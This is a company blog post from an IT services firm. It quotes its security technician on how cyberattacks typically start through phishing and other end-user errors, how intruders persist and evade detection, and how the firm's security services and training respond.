Anatomy of a Cyberattack
In the current digital landscape, the threat of cyberattacks looms over businesses like an invisible specter. How does an attack start? How do threat actors access your systems and evade detection? How can the right support help ensure your business is responding to — and mitigating — these threats as effectively as possible? Those are the questions we’ll tackle in this post.
Where Does it All Start?
What is the genesis of most cyber attacks and breaches? While there are a range of attack types, most have one thing in common: the end-user or employee is typically the gateway into any system. “The most common entry point is typically going to be an end user,” says Dan Roberts, Security Technician at Cooperative Systems. “It’s going to be a case of human error: someone clicks something they’re not supposed to and types in the wrong information in the wrong web page. It could be anything from a phishing email to a website that was hijacked to an ad that popped up. Someone opens a homepage and there’s a malicious advertisement there that’s been infected. Probably the most common, though, is going to be an end-user clicking on a link in a phishing email. That’s the one that we’re seeing across the board throughout the industry as one of the most common vectors of infection.” On the other side of the coin, your employees should also be a point of protection for your business. “It’s kind of a nomenclature in cybersecurity that end-users are the ‘human firewall,’” he continues. “They protect the endpoints and the network, and they work to prevent a lot of these attempts to get into networks, and so it’s very important that they understand the responsibility that they have in being in a business network or even at home. There are all sorts of different things to consider, and a lot of times end users don’t have the proper training or don’t think they’re important enough to be targeted, but that’s just not the case,” he adds.
Why Are Systems Targeted and How Are They Infiltrated?
Adversaries target businesses and systems for several reasons, not just for access. “There are a wide range of reasons,” Roberts notes. “You have some threat actors out there who do it just for laughs; just to be able to prove that they can get into somebody’s system. You have advanced persistent threats, or APTs, who are typically state actors that are attempting to gather information from foreign adversaries. You have hackers who are looking to get financial data, financial information, and financial logins. Money is definitely a driving factor, but sometimes there’s more money to be made in selling information than there is in the actual money that they could possibly get out of any accounts.” As adversaries become increasingly sophisticated, we’re seeing a larger “threat surface” and more techniques and methods for drilling into systems. Remote access trojans, or RATs, for example, have proliferated.
“Once RAT gets into your system, a threat actor will be able to access that endpoint at any time,” he says. “Some threat actors will sell that access to others. Again, that usually comes from Social Engineering; from someone clicking something they shouldn’t.”
Blending in and Evading Detection
Part of what makes threat actors so dangerous is their ability to get in a system and stay there. In fact, research has shown that an adversary can stay in a system for as long as 26 days of “dwell time” before being detected. So, how do they avoid detection?
“Typically, they do it through obfuscation,” states Roberts. “For example, they can gain access through an application they build into a startup process that reaches out to a web server. They can set up a startup process to launch in the background to be able to reach out and reinstall that application after you think it’s been cleared.” He notes that, while endpoint detection and response (EDR) and extended detection and response (XDR) have been doing a much better job at being able to pick up on obfuscation, standard antivirus or anti-malware may not pick up on an encryption, which might create a difference between what you’re seeing versus what’s actually happening.
Another problem is that threat actors are finding antivirus loopholes. “There have been multiple reports of different types of antivirus or even EDR solutions that are being leveraged in order to bypass any built-in settings,” he says. “Typically, they’re patched relatively quickly, but if you have a ‘zero day’ — a broad term that describes recently discovered security vulnerabilities that hackers can use to attack systems — it’s called that for a reason. It’s very difficult to anticipate where a threat is going to come from and how threat actors will manipulate your system to get an initial foothold.”
How Cooperative Systems Helps
As far as responding to and mitigating threats, Cooperative Systems utilizes a full security stack for detection, behavioral analysis, prediction, and resolution. “There is a large push for trying to adapt to the situations before they actually get to the point of getting to an infection,” says Roberts. “We also work hard to keep our fingers on the pulse. There are new threats seemingly every day, so we keep our eyes on the constantly evolving threat landscape. From a preventive standpoint, Doing the research and staying ahead of that curve has become one of our strengths. If there is a breach, we work with our clients on incident response and making them aware of the steps they need to take — we do a great deal of training — which can help reduce the chaos and stress should something occur.” For more information about our enhanced cybersecurity offerings, including in-depth cybersecurity awareness training for your employees, visit our website.